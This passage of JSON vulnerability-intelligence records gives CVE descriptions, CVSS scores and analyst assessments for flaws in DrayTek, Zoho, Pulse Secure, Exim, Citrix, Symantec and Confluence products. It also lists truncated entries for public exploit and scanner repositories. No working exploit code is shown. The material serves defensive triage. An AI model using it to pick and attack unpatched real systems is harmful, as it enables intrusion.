"version": "3.1"}, "impactScore": 5.9}, "published": "2018-05-19T00:00:00", "type": "attackerkb", "title": "CVE-2018-4939", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4939"], "modified": "2020-09-02T00:00:00", "id": "AKB:FDF5A3A7-D224-432D-A61A-88CFCB4B9799", "href": "https://attackerkb.com/topics/Zt4RJnPnpD/cve-2018-4939", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-20T20:13:32", "description": "DrayTek Vigor2960 1.3.1_Beta, Vigor3900 1.4.4_Beta, and Vigor300B 1.3.3_Beta, 1.4.2.1_Beta, and 1.4.4_Beta devices allow remote code execution as root (without authentication) via shell metacharacters to the cgi-bin/mainfunction.cgi URI. This issue has been fixed in Vigor3900/2960/300B v1.5.1.\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at October 20, 2020 7:10pm UTC reported:\n\nThis is now supposedly being exploited in the wild by Chinese state actors according to this NSA announcement: <https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF>\n\nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-02-01T00:00:00", "type": "attackerkb", "title": "CVE-2020-8515", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8515"], "modified": "2020-06-05T00:00:00", "id": "AKB:3AC01970-2631-4B37-B354-4040C1A7E983", "href": "https://attackerkb.com/topics/OTC0EHe2YO/cve-2020-8515", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-10-18T08:58:18", "description": "Zoho ManageEngine Desktop Central before 10.0.474 allows remote code execution because of deserialization of untrusted data in getChartImage in the FileStorage class. This is related to the CewolfServlet and MDMLogUploaderServlet servlets.\n\n \n**Recent assessments:** \n \n**J3rryBl4nks** at March 13, 2020 9:41pm UTC reported:\n\nDue to this being an unauthenticated serialization exploit, the bar for exploitation is very low. Serialization is rampant in software, and most companies aren\u2019t doing it correctly.\n\nIt\u2019s realtively easy these days to exploit serialization vulnerabilities with ysoserial/yososerial.net and it will be a problem for years going forward.\n\n**wvu-r7** at March 10, 2020 6:38pm UTC reported:\n\nDue to this being an unauthenticated serialization exploit, the bar for exploitation is very low. Serialization is rampant in software, and most companies aren\u2019t doing it correctly.\n\nIt\u2019s realtively easy these days to exploit serialization vulnerabilities with ysoserial/yososerial.net and it will be a problem for years going forward.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-03-06T00:00:00", "type": "attackerkb", "title": "CVE-2020-10189", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-10189"], "modified": "2023-10-06T00:00:00", "id": "AKB:86915DE7-C5F7-483B-A324-DF5B1929FBF6", "href": "https://attackerkb.com/topics/PyNCrvKjzq/cve-2020-10189", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-10-18T16:43:43", "description": "In Pulse Secure Pulse Connect Secure (PCS) 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4, an unauthenticated remote attacker can send a specially crafted URI to perform an arbitrary file reading vulnerability .\n\n \n**Recent assessments:** \n \n**dmelcher5151** at April 15, 2020 4:11pm UTC reported:\n\nCan download the session DB in one request and escalate to admin on the VPN concentrator. May not be configured to log unauthenticated requests. Causes massive damage. If not patched, likely wrecked.\n\n**hrbrmstr** at May 12, 2020 7:55pm UTC reported:\n\nCan download the session DB in one request and escalate to admin on the VPN concentrator. May not be configured to log unauthenticated requests. Causes massive damage. If not patched, likely wrecked.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2019-05-08T00:00:00", "type": "attackerkb", "title": "CVE-2019-11510", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510"], "modified": "2023-10-06T00:00:00", "id": "AKB:236680FB-F804-4F5D-B51D-4B50C9F69BBD", "href": "https://attackerkb.com/topics/lx3Afd7fbJ/cve-2019-11510", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-20T20:18:30", "description": "Exim SMTP email server (versions before 4.90) are vulnerable to remote code execution via a vulnerability in Base64 decoding.\n\n \n**Recent assessments:** \n \n**asoto-r7** at June 25, 2019 6:25pm UTC reported:\n\nThere are a few PoCs for this one. Exim is a bear to setup and I wouldn\u2019t be shocked to find unpatched servers because sysadmins don\u2019t want to touch them. Since they\u2019d be Internet-accessible, there\u2019s a lot of attacker utility here for the small population that uses Exim.\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 4Assessed Attacker Value: 0\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-02-08T00:00:00", "type": "attackerkb", "title": "Exim SMTP server RCE via base64d", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-6789"], "modified": "2020-02-13T00:00:00", "id": "AKB:63C1E977-B118-475C-8C47-1046B294E1BA", "href": "https://attackerkb.com/topics/s2eAU0s76p/exim-smtp-server-rce-via-base64d", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-10-22T07:43:34", "description": "Multiple vulnerabilities have been discovered in Citrix ADC (formerly known as NetScaler ADC), Citrix Gateway (formerly known as NetScaler Gateway) and Citrix SD-WAN WANOP appliance models 4000-WO, 4100-WO, 5000-WO, and 5100-WO. These vulnerabilities, if exploited, could result in a number of security issues .\n\n \n**Recent assessments:** \n \n**ccondon-r7** at July 10, 2020 11:15pm UTC reported:\n\nActive exploitation targeting recently published Citrix ADC vulns as of July 9, according to SANS ISC: <https://isc.sans.edu/forums/diary/Active+Exploit+Attempts+Targeting+Recent+Citrix+ADC+Vulnerabilities+CTX276688/26330/>\n\n**busterb** at July 10, 2020 11:17pm UTC reported:\n\nActive exploitation targeting recently published Citrix ADC vulns as of July 9, according to SANS ISC: <https://isc.sans.edu/forums/diary/Active+Exploit+Attempts+Targeting+Recent+Citrix+ADC+Vulnerabilities+CTX276688/26330/>\n\n**gwillcox-r7** at October 20, 2020 5:53pm UTC reported:\n\nActive exploitation targeting recently published Citrix ADC vulns as of July 9, according to SANS ISC: <https://isc.sans.edu/forums/diary/Active+Exploit+Attempts+Targeting+Recent+Citrix+ADC+Vulnerabilities+CTX276688/26330/>\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-07-09T00:00:00", "type": "attackerkb", "title": "CTX276688: Citrix Application Delivery Controller, Citrix Gateway, and Citrix SD-WAN WANOP appliance Security Update", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8187", "CVE-2020-8190", "CVE-2020-8191", "CVE-2020-8193", "CVE-2020-8194", "CVE-2020-8195", "CVE-2020-8196", "CVE-2020-8197", "CVE-2020-8198", "CVE-2020-8199"], "modified": "2020-07-09T00:00:00", "id": "AKB:69741DFD-3169-4113-B9D5-F2D752453CCA", "href": "https://attackerkb.com/comments/7cdfb3cc-0c4d-43e2-b2d5-88dca8befba8", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2021-07-20T20:13:33", "description": "The Symantec Messaging Gateway before 10.6.3-267 can encounter an issue of remote code execution, which describes a situation whereby an individual may obtain the ability to execute commands remotely on a target machine or in a target process. In this type of occurrence, after gaining access to the system, the attacker may attempt to elevate their privileges.\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at October 20, 2020 7:08pm UTC reported:\n\nThis is now supposedly being exploited in the wild by Chinese state actors according to this NSA announcement: <https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF>\n\nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "edition": 2, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-08-11T00:00:00", "type": "attackerkb", "title": "CVE-2017-6327", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": true, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-6327"], "modified": "2020-07-23T00:00:00", "id": "AKB:4501BDF0-F0BC-4E58-ABDB-5A03E74B412F", "href": "https://attackerkb.com/topics/b3My5ZDXcf/cve-2017-6327", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2021-07-20T20:13:38", "description": "The Widget Connector macro in Atlassian Confluence Server before version 6.6.12 (the fixed version for 6.6.x), from version 6.7.0 before 6.12.3 (the fixed version for 6.12.x), from version 6.13.0 before 6.13.3 (the fixed version for 6.13.x), and from version 6.14.0 before 6.14.2 (the fixed version for 6.14.x), allows remote attackers to achieve path traversal and remote code execution on a Confluence Server or Data Center instance via server-side template injection.\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at October 20, 2020 6:54pm UTC reported:\n\nThis is now supposedly being exploited in the wild by Chinese state actors according to this NSA announcement: <https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF>\n\nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-10-30T00:00:00", "type": "attackerkb", "title": "CVE-2019-3396", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-3396"], "modified": "2019-10-30T00:00:00", "id": "AKB:BFDD9A54-15E2-4C3F-A140-DA45C72DACDA", "href": "https://attackerkb.com/topics/8PZOMRtIAA/cve-2019-3396", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "githubexploit": [{"lastseen": "2022-03-23T23:33:45", "description": "# citrix_adc_netscaler_lfi_scan\n\n![alt text][citrix]\n\nThis Metas...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 2.5}, "published": "2020-07-12T13:37:53", "type": "githubexploit", "title": "Exploit for Missing Authorization in Citrix Application Delivery Controller Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8193", "CVE-2020-8195", "CVE-2020-8196"], "modified": "2021-10-10T19:00:30", "id": "92A57BC1-BAC9-5C0F-951A-E1FF05D87142", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}, "privateArea": 1}, {"lastseen": "2022-03-23T23:33:48", "description": "# CVE-2020-8193-Citrix-Scanner\n\nScanning for CVE-2020-8193 - Aut...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 2.5}, "published": "2020-07-13T10:36:43", "type": "githubexploit", "title": "Exploit for Missing Authorization in Citrix Application Delivery Controller Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8193", "CVE-2020-8195", "CVE-2020-8196"], "modified": "2021-12-15T14:39:48", "id": "F775D2F3-FF1F-529F-B0F3-99AB6A801264", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}, "privateArea": 1}, {"lastseen": "2022-03-06T10:03:57", "description": "# check-your-pulse #\n\n[![GitHub Build Status](https://github.com...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2020-04-16T16:32:47", "type": "githubexploit", "title": "Exploit for Path Traversal in Pulsesecure Pulse Connect Secure", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510", "CVE-2019-19781"], "modified": "2022-03-06T07:12:20", "id": "62891769-2887-58A7-A603-BCD5E6A6D6F9", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:34:15", "description": "# TelerikUI Python Scanner\r\n(telerik_rce_scan.py)\r\n<img align=\"c...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-08-26T20:57:11", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Telerik Ui For Asp.Net Ajax", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-18935"], "modified": "2021-07-21T15:53:50", "id": "92BBBF7B-026E-553A-883B-AEF503046C18", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-03-23T23:33:50", "description": "# Citrix ADC RCE \r\n\r\n## 0x01 CreateSession\r\n`request`\r\n```\r\nPOST...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 2.5}, "published": "2020-07-12T13:05:40", "type": "githubexploit", "title": "Exploit for Missing Authorization in Citrix Application Delivery Controller Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8193"], "modified": "2022-03-17T09:38:26", "id": "9C32E281-E6FB-587D-9ECC-F961B7082D43", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:30:16", "description": "# TelerikUI Python Scanner\r\n(telerik_rce_scan.py)\r\n<img align=\"c...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-05-25T08:37:51", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Telerik Ui For Asp.Net Ajax", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-18935"], "modified": "2021-08-17T19:04:54", "id": "05081BAE-6AEB-5206-8BEC-6D067EE4B660", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-18T02:59:21", "description": "# CVE-2019-11580\n## Atlassian Crowd and Crowd Data Center RCE\n\n#...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-07-17T07:54:38", "type": "githubexploit", "title": "Exploit for Vulnerability in Atlassian Crowd", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11580"], "modified": "2022-07-17T07:40:09", "id": "291B5382-1EED-522B-869C-C2AFDC4AB400", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-01-12T02:57:38", "description": "<b>[CVE-2019-18935] Telerik UI for ASP.NET AJAX (RadAsyncUpload ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-08-19T17:11:02", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Telerik Ui For Asp.Net Ajax", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-18935"], "modified": "2022-01-09T21:20:03", "id": "1741E720-F85A-5179-AB8A-D6FA2E185092", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-09T01:53:05", "description": "# CVE-2019-18935\n\nProof-of-concept exploit for a .NET JSON deser...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": 